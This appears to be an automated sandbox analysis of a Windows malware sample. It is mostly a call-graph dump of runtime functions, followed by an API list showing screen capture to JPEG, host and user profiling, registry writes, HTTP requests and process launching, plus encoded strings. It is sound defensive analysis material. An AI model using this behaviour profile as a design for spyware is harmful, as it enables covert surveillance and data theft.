17044->17060 17053 41fdbb 17046->17053 17054 419831 _free 14 API calls 17047->17054 17050->17039 17088 41fa36 17053->17088 17054->17033 17100 41fecc 17058->17100 17059->17043 17061 41f949 17060->17061 17087 41fa32 17060->17087 17062 41f95a 17061->17062 17063 419831 _free 14 API calls 17061->17063 17063->17062 17087->17042 17089 41fa43 17088->17089 17090 41fa9b 17088->17090 17090->17059 17101 41fed9 17100->17101 17102 41fef8 17100->17102 17101->17102 17103 41fad7 __fassign 14 API calls 17101->17103 17102->17039 17104 41fef2 17103->17104 17106->17031 17108 418f89 17107->17108 17109 418f97 17107->17109 17108->17109 17114 418fae 17108->17114 17110 416437 __dosmaperr 14 API calls 17109->17110 17111 418f9f 17110->17111 17119 417ea2 17111->17119 17113 418fa9 17113->16933 17114->17113 17115 416437 __dosmaperr 14 API calls 17114->17115 17115->17111 17117 419831 _free 14 API calls 17116->17117 17118 4179af 17117->17118 17118->16934 17122 417e3e 17119->17122 17121 417eae 17121->17113 17123 41a279 __dosmaperr 14 API calls 17122->17123 17124 417e49 17123->17124 17125 417e57 17124->17125 17130 417ecf IsProcessorFeaturePresent 17124->17130 17125->17121 17127 417ea1 17128 417e3e __wsopen_s 25 API calls 17127->17128 17129 417eae 17128->17129 17129->17121 17131 417edb 17130->17131 17134 417cf6 17131->17134 17135 417d12 ___scrt_fastfail 17134->17135 17136 417d3e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17135->17136 17137 417e0f ___scrt_fastfail 17136->17137 17140 4139d2 17137->17140 17139 417e2d GetCurrentProcess TerminateProcess 17139->17127 17141 4139db 17140->17141 17142 4139dd IsProcessorFeaturePresent 17140->17142 17141->17139 17144 413a1f 17142->17144 17147 4139e3 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17144->17147 17146 413b02 17146->17139 17147->17146 17149 417f56 ___scrt_is_nonwritable_in_current_image 17148->17149 17154 419123 EnterCriticalSection 17149->17154 17151 417f61 17155 417f9d 17151->17155 17154->17151 17158 41916b LeaveCriticalSection 17155->17158 17157 417f28 17157->16892 17158->17157 17164 412e29 17159->17164 17162 413b86 Concurrency::cancel_current_task RaiseException 17163 412f09 17162->17163 17167 412d9f 17164->17167 17168 413b04 ___std_exception_copy 26 API calls 17167->17168 17169 412dcb 17168->17169 17169->17162 17171 413178 17170->17171 17172 41317f 17170->17172 17176 418973 17171->17176 17179 4189df 17172->17179 17175 40191b 17177 4189df 28 API calls 17176->17177 17178 418985 17177->17178 17178->17175 17182 418715 17179->17182 17183 418721 ___scrt_is_nonwritable_in_current_image 17182->17183 17190 419123 EnterCriticalSection 17183->17190 17185 41872f 17191 418770 17185->17191 17187 41873c 17201 418764 17187->17201 17190->17185 17192 41878c 17191->17192 17194 418803 __dosmaperr 17191->17194 17193 4187e3 17192->17193 17192->17194 17204 41f4db 17192->17204 17193->17194 17196 41f4db 28 API calls 17193->17196 17194->17187 17198 4187f9 17196->17198 17197 4187d9 17199 419831 _free 14 API calls 17197->17199 17200 419831 _free 14 API calls 17198->17200 17199->17193 17200->17194 17239 41916b LeaveCriticalSection 17201->17239 17203 41874d 17203->17175 17205 41f503 17204->17205 17206 41f4e8 17204->17206 17210 41f512 17205->17210 17213 42461c 17205->17213 17206->17205 17207 41f4f4 17206->17207 17208 416437 __dosmaperr 14 API calls 17207->17208 17212 41f4f9 ___scrt_fastfail 17208->17212 17220 42464f 17210->17220 17212->17197 17214 424627 17213->17214 17215 42463c HeapSize 17213->17215 17216 416437 __dosmaperr 14 API calls 17214->17216 17215->17210 17217 42462c 17216->17217 17218 417ea2 __wsopen_s 25 API calls 17217->17218 17219 424637 17218->17219 17219->17210 17221 424667 17220->17221 17222 42465c 17220->17222 17224 42466f 17221->17224 17230 424678 __dosmaperr 17221->17230 17232 419d1a 17222->17232 17225 419831 _free 14 API calls 17224->17225 17228 424664 17225->17228 17226 4246a2 HeapReAlloc 17226->17228 17226->17230 17227 42467d 17229 416437 __dosmaperr 14 API calls 17227->17229 17228->17212 17229->17228 17230->17226 17230->17227 17231 417f1d __dosmaperr 2 API calls 17230->17231 17231->17230 17233 419d58 17232->17233 17238 419d28 __dosmaperr 17232->17238 17235 416437 __dosmaperr 14 API calls 17233->17235 17234 419d43 RtlAllocateHeap 17236 419d56 17234->17236 17234->17238 17235->17236 17236->17228 17237 417f1d __dosmaperr 2 API calls 17237->17238 17238->17233 17238->17234 17238->17237 17239->17203 17579 407fcb 17580 407fd5 17579->17580 17581 40830d 17579->17581 17580->17581 17583 407fdf InternetOpenW InternetConnectA 17580->17583 17582 412440 27 API calls 17581->17582 17611 408252 17582->17611 17584 4120d0 27 API calls 17583->17584 17585 40803e 17584->17585 17586 402150 55 API calls 17585->17586 17588 408046 HttpOpenRequestA 17586->17588 17587 408308 17592 408073 17588->17592 17593 408095 17588->17593 17589 417eb2 25 API calls 17591 4083c1 17589->17591 17592->17593 17595 4083b2 17592->17595 17594 4120d0 27 API calls 17593->17594 17596 4080c6 17594->17596 17597 417eb2 25 API calls 17595->17597 17598 402150 55 API calls 17596->17598 17599 4083b7 17597->17599 17600 4080ce 17598->17600 17601 417eb2 25 API calls 17599->17601 17602 4120d0 27 API calls 17600->17602 17601->17611 17603 4080f4 17602->17603 17604 402150 55 API calls 17603->17604 17605 4080fc HttpSendRequestA 17604->17605 17606 408117 17605->17606 17606->17599 17607 408181 InternetReadFile 17606->17607 17608 408177 17606->17608 17609 4081a2 17607->17609 17610 408224 InternetCloseHandle InternetCloseHandle InternetCloseHandle 17607->17610 17608->17607 17612 408221 17609->17612 17613 4081b2 17609->17613 17610->17611 17611->17587 17611->17589 17612->17610 17613->17609 17614 4128e0 27 API calls 17613->17614 17615 4081f1 InternetReadFile 17613->17615 17614->17615 17615->17612 17615->17613 18753 4083df 18754 4083e9 18753->18754 18760 40840c 18753->18760 18768 415614 18754->18768 18757 4084e6 18758 408406 18771 4156a2 18758->18771 18760->18757 18762 417eb2 25 API calls 18760->18762 18761 415614 28 API calls 18767 408411 18761->18767 18763 4084f9 18762->18763 18764 4156a2 67 API calls 18764->18767 18765 408471 Sleep 18765->18760 18765->18767 18766 4120d0 27 API calls 18766->18767 18767->18761 18767->18764 18767->18765 18767->18766 18784 41555d 18768->18784 18772 4156ae ___scrt_is_nonwritable_in_current_image 18771->18772 18773 4156b8 18772->18773 18774 4156cd 18772->18774 18775 416437 __dosmaperr 14 API calls 18773->18775 18780 4156c8 18774->18780 18836 4192d7 EnterCriticalSection 18774->18836 18776 4156bd 18775->18776 18778 417ea2 __wsopen_s 25 API calls 18776->18778 18778->18780 18779 4156ea 18837 41562b 18779->18837 18780->18760 18782 4156f5 18853 41571c 18782->18853 18786 415569 ___scrt_is_nonwritable_in_current_image 18784->18786 18785 415570 18787 416437 __dosmaperr 14 API calls 18785->18787 18786->18785 18788 415590 18786->18788 18789 415575 18787->18789 18790 4155a2 18788->18790 18791 415595 18788->18791 18792 417ea2 __wsopen_s 25 API calls 18789->18792 18801 4192ff 18790->18801 18793 416437 __dosmaperr 14 API calls 18791->18793 18795 4083ff 18792->18795 18793->18795 18795->18758 18795->18767 18797 4155b2 18799 416437 __dosmaperr 14 API calls 18797->18799 18798 4155bf 18809 4155fd 18798->18809 18799->18795 18802 41930b ___scrt_is_nonwritable_in_current_image 18801->18802 18813 419123 EnterCriticalSection 18802->18813 18804 419319 18814 4193a3 18804->18814 18810 415601 18809->18810 18835 4192eb LeaveCriticalSection 18810->18835 18812 415612 18812->18795 18813->18804 18815 4193c6 18814->18815 18816 41941e 18815->18816 18823 419326 18815->18823 18831 4192d7 EnterCriticalSection 18815->18831 18832 4192eb LeaveCriticalSection 18815->18832 18817 41dfbf __dosmaperr 14 API calls 18816->18817 18818 419427 18817->18818 18820 419831 _free 14 API calls 18818->18820 18821 419430 18820->18821 18822 41a6e1 __wsopen_s 6 API calls 18821->18822 18821->18823 18824 41944f 18822->18824 18828 41935f 18823->18828 18833 4192d7 EnterCriticalSection 18824->18833 18827 419462 18827->18823 18834 41916b LeaveCriticalSection 18828->18834 18830 4155ab 18830->18797 18830->18798 18831->18815 18832->18815 18833->18827 18834->18830 18835->18812 18836->18779 18838 415638 18837->18838 18839 41564d 18837->18839 18840 416437 __dosmaperr 14 API calls 18838->18840 18843 415648 18839->18843 18856 419c64 18839->18856 18842 41563d 18840->18842 18845 417ea2 __wsopen_s 25 API calls 18842->18845 18843->18782 18845->18843 18849 415670 18873 4198f7 18849->18873 18852 419831 _free 14 API calls 18852->18843 18904 4192eb LeaveCriticalSection 18853->18904 18855 415724 18855->18780 18857 415662 18856->18857 18858 419c7c 18856->18858 18862 419a47 18857->18862 18858->18857 18859 419a20 __fread_nolock 25 API calls 18858->18859 18860 419c9a 18859->18860 18861 41be00 __wsopen_s 62 API calls 18860->18861 18861->18857 18863 41566a 18862->18863 18864 419a5e 18862->18864 18866 419a20 18863->18866 18864->18863 18865 419831 _free 14 API calls 18864->18865 18865->18863 18867 419a41 18866->18867 18868 419a2c 18866->18868 18867->18849 18869 416437 __dosmaperr 14 API calls 18868->18869 18870 419a31 18869->18870 18871 417ea2 __wsopen_s 25 API calls 18870->18871 18872 419a3c 18871->18872 18872->18849 18874 419908 18873->18874 18879 41991d 18873->18879 18875 416424 __dosmaperr 14 API calls 18874->18875 18878 41990d 18875->18878 18876 419966 18877 416424 __dosmaperr 14 API calls 18876->18877 18881 41996b 18877->18881 18882 416437 __dosmaperr 14 API calls 18878->18882 18879->18876 18880 419944 18879->18880 18888 41986b 18880->18888 18884 416437 __dosmaperr 14 API calls 18881->18884 18885 415676 18882->18885 18886 419973 18884->18886 18885->18843 18885->18852 18887 417ea2 __wsopen_s 25 API calls 18886->18887 18887->18885 18889 419877 ___scrt_is_nonwritable_in_current_image 18888->18889 18899 41af12 EnterCriticalSection 18889->18899 18891 419885 18892 4198b7 18891->18892 18893 4198ac 18891->18893 18895 416437 __dosmaperr 14 API calls 18892->18895 18894 419984 __wsopen_s 28 API calls 18893->18894 18896 4198b2 18894->18896 18895->18896 18900 4198eb 18896->18900 18899->18891 18903 41afc7 LeaveCriticalSection 18900->18903 18902 4198d4 18902->18885 18903->18902 18904->18855 21652 419fe9 21653 419ff4 21652->21653 21654 41a004 21652->21654 21658 41a00a 21653->21658 21657 419831 _free 14 API calls 21657->21654 21659 41a025 21658->21659 21660 41a01f 21658->21660 21661 419831 _free 14 API calls 21659->21661 21662 419831 _free 14 API calls 21660->21662 21663 41a031 21661->21663 21662->21659 21664 419831 _free 14 API calls 21663->21664 21665 41a03c 21664->21665 21666 419831 _free 14 API calls 21665->21666 21667 41a047 21666->21667 21668 419831 _free 14 API calls 21667->21668 21669 41a052 21668->21669 21670 419831 _free 14 API calls 21669->21670 21671 41a05d 21670->21671 21672 419831 _free 14 API calls 21671->21672 21673 41a068 21672->21673 21674 419831 _free 14 API calls 21673->21674 21675 41a073 21674->21675 21676 419831 _free 14 API calls 21675->21676 21677 41a07e 21676->21677 21678 419831 _free 14 API calls 21677->21678 21679 41a08c 21678->21679 21684 419e36 21679->21684 21685 419e42 ___scrt_is_nonwritable_in_current_image 21684->21685 21700 419123 EnterCriticalSection 21685->21700 21687 419e76 21701 419e95 21687->21701 21689 419e4c 21689->21687 21691 419831 _free 14 API calls 21689->21691 21691->21687 21692 419ea1 21693 419ead ___scrt_is_nonwritable_in_current_image 21692->21693 21705 419123 EnterCriticalSection 21693->21705 21695 419eb7 21696 41a0d7 __dosmaperr 14 API calls 21695->21696 21697 419eca 21696->21697 21706 419eea 21697->21706 21700->21689 21704 41916b LeaveCriticalSection 21701->21704 21703 419e83 21703->21692 21704->21703 21705->21695 21709 41916b LeaveCriticalSection 21706->21709 21708 419ed8 21708->21657 21709->21708 19364 4037f0 19365 412440 27 API calls 19364->19365 19366 40380e 19365->19366 19367 412440 27 API calls 19366->19367 19368 403827 19367->19368 19369 412440 27 API calls 19368->19369 19370 403840 CreateThread Sleep SuspendThread 19369->19370 19374 40387e 19370->19374 19375 403780 19370->19375 19371 417eb2 25 API calls 19373 40397f 19371->19373 19372 40396a 19374->19371 19374->19372 19376 412440 27 API calls 19375->19376 19377 4037a2 19376->19377 19378 4120d0 27 API calls 19377->19378 19379 4037b1 19378->19379 19380 4120d0 27 API calls 19379->19380 19381 4037c0 19380->19381 19382 4120d0 27 API calls 19381->19382 19383 4037cf 19382->19383 19386 4034e0 19383->19386 19385 4037d4 19387 403500 19386->19387 19388 40363c ShellExecuteExW 19387->19388 19389 403650 19388->19389 19392 403672 19388->19392 19390 403666 WaitForSingleObject 19389->19390 19389->19392 19390->19392 19391 417eb2 25 API calls 19394 40377e 19391->19394 19392->19391 19393 403766 19392->19393 19393->19385 19395 412440 27 API calls 19394->19395 19396 4037a2 19395->19396 19397 4120d0 27 API calls 19396->19397 19398 4037b1 19397->19398 19399 4120d0 27 API calls 19398->19399 19400 4037c0 19399->19400 19401 4120d0 27 API calls 19400->19401 19402 4037cf 19401->19402 19403 4034e0 27 API calls 19402->19403 19404 4037d4 19403->19404 19404->19385 20804 41b5fb 20805 41b607 ___scrt_is_nonwritable_in_current_image 20804->20805 20816 419123 EnterCriticalSection 20805->20816 20807 41b60e 20817 41ae74 20807->20817 20810 41b62c 20841 41b652 20810->20841 20816->20807 20818 41ae80 ___scrt_is_nonwritable_in_current_image 20817->20818 20819 41ae89 20818->20819 20820 41aeaa 20818->20820 20821 416437 __dosmaperr 14 API calls 20819->20821 20844 419123 EnterCriticalSection 20820->20844 20823 41ae8e 20821->20823 20825 417ea2 __wsopen_s 25 API calls 20823->20825 20824 41aeb6 20828 41adc4 __wsopen_s 15 API calls 20824->20828 20829 41aee2 20824->20829 20826 41ae98 20825->20826 20826->20810 20830 41b491 GetStartupInfoW 20826->20830 20828->20824 20845 41af09 20829->20845 20831 41b542 20830->20831 20832 41b4ae 20830->20832 20836 41b547 20831->20836 20832->20831 20833 41ae74 26 API calls 20832->20833 20834 41b4d6 20833->20834 20834->20831 20835 41b506 GetFileType 20834->20835 20835->20834 20840 41b54e 20836->20840 20837 41b591 GetStdHandle 20837->20840 20838 41b5f7 20838->20810 20839 41b5a4 GetFileType 20839->20840 20840->20837 20840->20838 20840->20839 20849 41916b LeaveCriticalSection 20841->20849 20843 41b63d 20844->20824 20848 41916b LeaveCriticalSection 20845->20848 20847 41af10 20847->20826 20848->20847 20849->20843 17616 40638b GetFileAttributesA 17617 406397 17616->17617 17618 406457 17617->17618 17619 407016 17617->17619 17622 412440 27 API calls 17618->17622 17620 40704d 17619->17620 17621 417eb2 25 API calls 17619->17621 17621->17620 17623 407008 17622->17623 18449 415999 18450 4159b5 18449->18450 18451 4159a7 18449->18451 18452 415878 __wsopen_s 37 API calls 18450->18452 18453 415a0b 57 API calls 18451->18453 18454 4159cf 18452->18454 18455 4159b1 18453->18455 18456 4157d8 __wsopen_s 17 API calls 18454->18456 18457 4159dc 18456->18457 18458 4159e3 18457->18458 18462 415a0b 18457->18462 18460 419831 _free 14 API calls 18458->18460 18461 415a05 18458->18461 18460->18461 18463 415a36 ___scrt_fastfail 18462->18463 18464 415a19 18462->18464 18468 415a78 CreateFileW 18463->18468 18469 415a5c 18463->18469 18465 416424 __dosmaperr 14 API calls 18464->18465 18466 415a1e 18465->18466 18467 416437 __dosmaperr 14 API calls 18466->18467 18473 415a26 18467->18473 18471 415aaa 18468->18471 18472 415a9c 18468->18472 18470 416424 __dosmaperr 14 API calls 18469->18470 18474 415a61 18470->18474 18511 415ae9 18471->18511 18485 415b73 GetFileType 18472->18485 18476 417ea2 __wsopen_s 25 API calls 18473->18476 18478 416437 __dosmaperr 14 API calls 18474->18478 18479 415a31 18476->18479 18480 415a68 18478->18480 18479->18458 18481 417ea2 __wsopen_s 25 API calls 18480->18481 18484 415a73 18481->18484 18482 415adb CloseHandle 18482->18484 18483 415aa5 ___scrt_fastfail 18483->18482 18483->18484 18484->18458 18486 415c60 18485->18486 18487 415bae 18485->18487 18489 415c8c 18486->18489 18491 415c6a 18486->18491 18488 415bc8 ___scrt_fastfail 18487->18488 18539 415ee9 18487->18539 18493 415be7 GetFileInformationByHandle 18488->18493 18510 415c57 18488->18510 18492 415cb6 PeekNamedPipe 18489->18492 18489->18510 18494 415c7d GetLastError 18491->18494 18495 415c6e 18491->18495 18492->18510 18493->18494 18497 415bfd 18493->18497 18499 416401 __dosmaperr 14 API calls 18494->18499 18498 416437 __dosmaperr 14 API calls 18495->18498 18496 4139d2 _ValidateLocalCookies 5 API calls 18500 415ce1 18496->18500 18522 415e3b 18497->18522 18498->18510 18499->18510 18500->18483 18505 415ce3 7 API calls 18506 415c2d 18505->18506 18507 415ce3 7 API calls 18506->18507 18508 415c44 18507->18508 18546 415e08 18508->18546 18510->18496 18592 416086 18511->18592 18514 415b08 18517 415e3b 38 API calls 18514->18517 18515 415afc 18516 416401 __dosmaperr 14 API calls 18515->18516 18518 415b03 18516->18518 18519 415b15 18517->18519 18518->18483 18520 415ee9 21 API calls 18519->18520 18521 415b34 18520->18521 18521->18483 18523 415e51 _wcsrchr 18522->18523 18531 415c09 18523->18531 18551 41acc3 18523->18551 18525 415e95 18526 41acc3 38 API calls 18525->18526 18525->18531 18527 415ea6 18526->18527 18528 41acc3 38 API calls 18527->18528 18527->18531 18529 415eb7 18528->18529 18530 41acc3 38 API calls 18529->18530 18529->18531 18530->18531 18532 415ce3 18531->18532 18533 415d09 FileTimeToSystemTime 18532->18533 18534 415cfb 18532->18534 18535 415d1b SystemTimeToTzSpecificLocalTime 18533->18535 18536 415d01 18533->18536 18534->18533 18534->18536 18535->18536 18537 4139d2 _ValidateLocalCookies 5 API calls 18536->18537 18538 415c1a 18537->18538 18538->18505 18540 415f02 18539->18540 18541 415f38 18540->18541 18542 415f16 18540->18542 18576 41a8c8 18541->18576 18544 415f23 18542->18544 18545 416401 __dosmaperr 14 API calls 18542->18545 18544->18488 18545->18544 18547 415e1c 18546->18547 18548 415e26 18547->18548 18549 416437 __dosmaperr 14 API calls 18547->18549 18548->18510 18550 415e31 18549->18550 18550->18510 18552 41acf4 18551->18552 18555 41acd1 18551->18555 18561 41ad0c 18552->18561 18554 41acd7 18557 416437 __dosmaperr 14 API calls 18554->18557 18555->18552 18555->18554 18556 41ad07 18556->18525 18558 41acdc 18557->18558 18559 417ea2 __wsopen_s 25 API calls 18558->18559 18560 41ace7 18559->18560 18560->18525 18562 41ad36 18561->18562 18563 41ad1c 18561->18563 18564 41ad55 18562->18564 18565 41ad3e 18562->18565 18566 416437 __dosmaperr 14 API calls 18563->18566 18569 4157f5 __fassign 37 API calls 18564->18569 18568 416437 __dosmaperr 14 API calls 18565->18568 18567 41ad21 18566->18567 18570 417ea2 __wsopen_s 25 API calls 18567->18570 18571 41ad43 18568->18571 18574 41ad60 18569->18574 18575 41ad2c 18570->18575 18572 417ea2 __wsopen_s 25 API calls 18571->18572 18572->18575 18573 41ac84 38 API calls 18573->18574 18574->18573 18574->18575 18575->18556 18590 413ef0 18576->18590 18579 41a91d 18581 41dfbf __dosmaperr 14 API calls 18579->18581 18580 41a90e 18586 4139d2 _ValidateLocalCookies 5 API calls 18580->18586 18582 41a92a 18581->18582 18583 41a932 GetCurrentDirectoryW 18582->18583 18584 41a93e 18582->18584 18583->18584 18588 41a943 18583->18588 18585 416437 __dosmaperr 14 API calls 18584->18585 18585->18588 18587 41a96a 18586->18587 18587->18544 18589 419831 _free 14 API calls 18588->18589 18589->18580 18591 413f07 GetCurrentDirectoryW 18590->18591 18591->18579 18591->18580 18593 4160aa 18592->18593 18594 4160b0 18593->18594 18602 415da8 18593->18602 18596 4139d2 _ValidateLocalCookies 5 API calls 18594->18596 18597 415af7 18596->18597 18597->18514 18597->18515 18598 416113 18599 417997 ___std_exception_copy 14 API calls 18598->18599 18599->18594 18600 4160d6 18600->18598 18601 416105 GetDriveTypeW 18600->18601 18601->18598 18603 416437 __dosmaperr 14 API calls 18602->18603 18604 415db4 18603->18604 18605 416437 __dosmaperr 14 API calls 18604->18605 18606 415dbb 18605->18606 18615 41abdb 18606->18615 18609 416437 __dosmaperr 14 API calls 18610 415dd6 18609->18610 18611 416437 __dosmaperr 14 API calls 18610->18611 18614 415dda 18610->18614 18612 415dee 18611->18612 18613 41abdb 35 API calls 18612->18613 18613->18614 18614->18600 18618 41aa3e 18615->18618 18619 41aaba 18618->18619 18620 41aa4e 18618->18620 18658 4214c2 18619->18658 18620->18619 18621 41aa55 18620->18621 18623 41aa62 18621->18623 18624 41aa85 18621->18624 18632 41a96c GetFullPathNameW 18623->18632 18642 41a9d5 GetFullPathNameW 18624->18642 18625 415dcc 18625->18609 18631 417997 ___std_exception_copy 14 API calls 18631->18625 18633 41a9a2 18632->18633 18634 41a98c GetLastError 18632->18634 18637 41a99e 18633->18637 18661 41aaf0 18633->18661 18635 416401 __dosmaperr 14 API calls 18634->18635 18638 41a998 18635->18638 18637->18625 18640 416437 __dosmaperr 14 API calls 18638->18640 18640->18637 18641 41a9b8 GetFullPathNameW 18641->18634 18641->18637 18643 41a9f5 GetLastError 18642->18643 18645 41aa0b 18642->18645 18644 416401 __dosmaperr 14 API calls 18643->18644 18647 41aa01 18644->18647 18646 41aa07 18645->18646 18665 41ab17 18645->18665 18652 41ab75 18646->18652 18649 416437 __dosmaperr 14 API calls 18647->18649 18649->18646 18651 41aa21 GetFullPathNameW 18651->18643 18651->18646 18653 41ab82 18652->18653 18657 41aaa5 18652->18657 18654 417f03 ___std_exception_copy 15 API calls 18653->18654 18653->18657 18655 41ab9b 18654->18655 18677 417c75 18655->18677 18657->18625 18657->18631 18691 4212ec 18658->18691 18662 41aafb 18661->18662 18663 416437 __dosmaperr 14 API calls 18662->18663 18664 41a9b0 18663->18664 18664->18637 18664->18641 18670 41aad6 18665->18670 18671 41aae1 18670->18671 18672 41aae9 18670->18672 18673 417997 ___std_exception_copy 14 API calls 18671->18673 18674 41ab56 18672->18674 18673->18672 18675 417f03 ___std_exception_copy 15 API calls 18674->18675 18676 41aa19 18675->18676 18676->18646 18676->18651 18678 417c86 18677->18678 18682 417c82 __fread_nolock 18677->18682 18679 417c8d 18678->18679 18683 417ca0 ___scrt_fastfail 18678->18683 18680 416437 __dosmaperr 14 API calls 18679->18680 18681 417c92 18680->18681 18684 417ea2 __wsopen_s 25 API calls 18681->18684 18682->18657 18683->18682 18685 417cd7 18683->18685 18686 417cce 18683->18686 18684->18682 18685->18682 18689 416437 __dosmaperr 14 API calls 18685->18689 18687 416437 __dosmaperr 14 API calls 18686->18687 18688 417cd3 18687->18688 18690 417ea2 __wsopen_s 25 API calls 18688->18690 18689->18688 18690->18682 18692 42130a 18691->18692 18693 42131e 18691->18693 18694 416437 __dosmaperr 14 API calls 18692->18694 18695 421326 18693->18695 18696 42135d 18693->18696 18697 42130f 18694->18697 18728 421446 18695->18728 18698 41a8c8 21 API calls 18696->18698 18700 417ea2 __wsopen_s 25 API calls 18697->18700 18702 421362 18698->18702 18726 42131a 18700->18726 18708 421396 18702->18708 18709 4213fd 18702->18709 18703 421331 18704 416424 __dosmaperr 14 API calls 18703->18704 18706 421336 18704->18706 18705 4139d2 _ValidateLocalCookies 5 API calls 18707 42135b 18705->18707 18710 416437 __dosmaperr 14 API calls 18706->18710 18707->18625 18711 41ab17 15 API calls 18708->18711 18712 421411 18709->18712 18713 421401 18709->18713 18714 421341 18710->18714 18716 4213b3 18711->18716 18715 41a96c 17 API calls 18712->18715 18717 416437 __dosmaperr 14 API calls 18713->18717 18719 417ea2 __wsopen_s 25 API calls 18714->18719 18715->18726 18718 41a9d5 18 API calls 18716->18718 18717->18714 18720 4213c0 18718->18720 18719->18726 18721 4213c6 18720->18721 18722 4213e5 18720->18722 18723 41ab75 26 API calls 18721->18723 18725 417997 ___std_exception_copy 14 API calls 18722->18725 18722->18726 18724 4213ce 18723->18724 18724->18726 18727 417997 ___std_exception_copy 14 API calls 18724->18727 18725->18726 18726->18705 18727->18726 18729 421460 18728->18729 18730 42147d 18728->18730 18733 416424 __dosmaperr 14 API calls 18729->18733 18731 42147b 18730->18731 18732 421486 GetDriveTypeW 18730->18732 18736 4139d2 _ValidateLocalCookies 5 API calls 18731->18736 18732->18731 18734 421465 18733->18734 18735 416437 __dosmaperr 14 API calls 18734->18735 18737 421470 18735->18737 18738 42132c 18736->18738 18739 417ea2 __wsopen_s 25 API calls 18737->18739 18738->18702 18738->18703 18739->18731 18913 406dab GetFileAttributesA 18914 406db7 18913->18914 18915 407043 18914->18915 18918 406e77 18914->18918 18916 417eb2 25 API calls 18915->18916 18917 407048 18916->18917 18919 40704d 18917->18919 18920 417eb2 25 API calls 18917->18920 18921 412440 27 API calls 18918->18921 18920->18919 18922 407008 18921->18922
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023C1
                                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023E9
                                                                                • RegCloseKey.KERNEL32(?,?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023F2
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000001,00000000,000F003F,?), ref: 004024D9
                                                                                • RegSetValueExA.KERNEL32(80000001,?,00000000,00000001,?,?), ref: 00402507
                                                                                • RegCloseKey.ADVAPI32(80000001), ref: 00402510
                                                                                • GdiplusStartup.GDIPLUS(?,?,00000000,?,?,?), ref: 0040261B
                                                                                • GetDC.USER32(00000000), ref: 00402702
                                                                                • RegGetValueA.ADVAPI32(80000002,?,00000000,00000018,00000000,?,00000004), ref: 00402934
                                                                                • GetSystemMetrics.USER32 ref: 00402977
                                                                                • GetSystemMetrics.USER32 ref: 00402984
                                                                                • RegGetValueA.ADVAPI32(80000002,?,00000000,00000018,00000000,?,00000004), ref: 004029C9
                                                                                • GetSystemMetrics.USER32 ref: 00402A06
                                                                                • GetSystemMetrics.USER32 ref: 00402A13
                                                                                • CreateCompatibleDC.GDI32(?), ref: 00402A1C
                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00402A2E
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00402A3B
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,?), ref: 00402A5B
                                                                                • GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,00000010), ref: 00402A6F
                                                                                • GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 00402A8B
                                                                                • GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 00402AB2
                                                                                • GdipSaveImageToFile.GDIPLUS(00000000,?,?,00000000), ref: 00402B3D
                                                                                • SelectObject.GDI32(00000000,?), ref: 00402B47
                                                                                • DeleteObject.GDI32(00000000), ref: 00402B54
                                                                                • DeleteObject.GDI32(?), ref: 00402B59
                                                                                • ReleaseDC.USER32 ref: 00402B60
                                                                                • GdipDisposeImage.GDIPLUS(00000000), ref: 00402B67
                                                                                • GdiplusShutdown.GDIPLUS(?), ref: 00402BEC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Gdip$ImageMetricsObjectSystemValue$Create$BitmapCloseCompatibleDeleteEncodersGdiplusOpenSelect$DisposeFileFromQueryReleaseSaveShutdownSizeStartup
                                                                                • String ID: B9CB95C7A17F76$BF92619262$image/jpeg
                                                                                • API String ID: 406439762-201665791
                                                                                • Opcode ID: da2e381cba87a9605bac58802247654183988af180270529bf3738f7760e3346
                                                                                • Instruction ID: 66f73b8d5c6259ecd1855038438daf41d162fabdd216e9d7ef4dc30fd7a02504
                                                                                • Opcode Fuzzy Hash: da2e381cba87a9605bac58802247654183988af180270529bf3738f7760e3346
                                                                                • Instruction Fuzzy Hash: F1622B31A002049BEF18DF64CD89BEDBB76EF45304F50816DF805A72C5DBB99A85CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00404B50: GetVersionExW.KERNEL32(0000011C,?,76C86490), ref: 00404BA7
                                                                                  • Part of subcall function 00405230: GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00405286
                                                                                • IsUserAnAdmin.SHELL32 ref: 0040F230
                                                                                  • Part of subcall function 00402150: RegOpenKeyExA.KERNEL32(?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023C1
                                                                                  • Part of subcall function 00402150: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023E9
                                                                                  • Part of subcall function 00402150: RegCloseKey.KERNEL32(?,?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023F2
                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 0040F2B3
                                                                                • GetComputerNameExW.KERNEL32(00000002,?,?,?,?,?), ref: 0040F3B5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: NameUserVersion$AdminCloseComputerOpenQueryValue
                                                                                • String ID: 31f5cd$425620883392$89C3A39F$89C3A79F$89C49A9F$89C69E9F$89CEA79F$89D1A49F$89D2949F$89D5959F$89D79F9F$89D8A49F$96906292$CCC66E
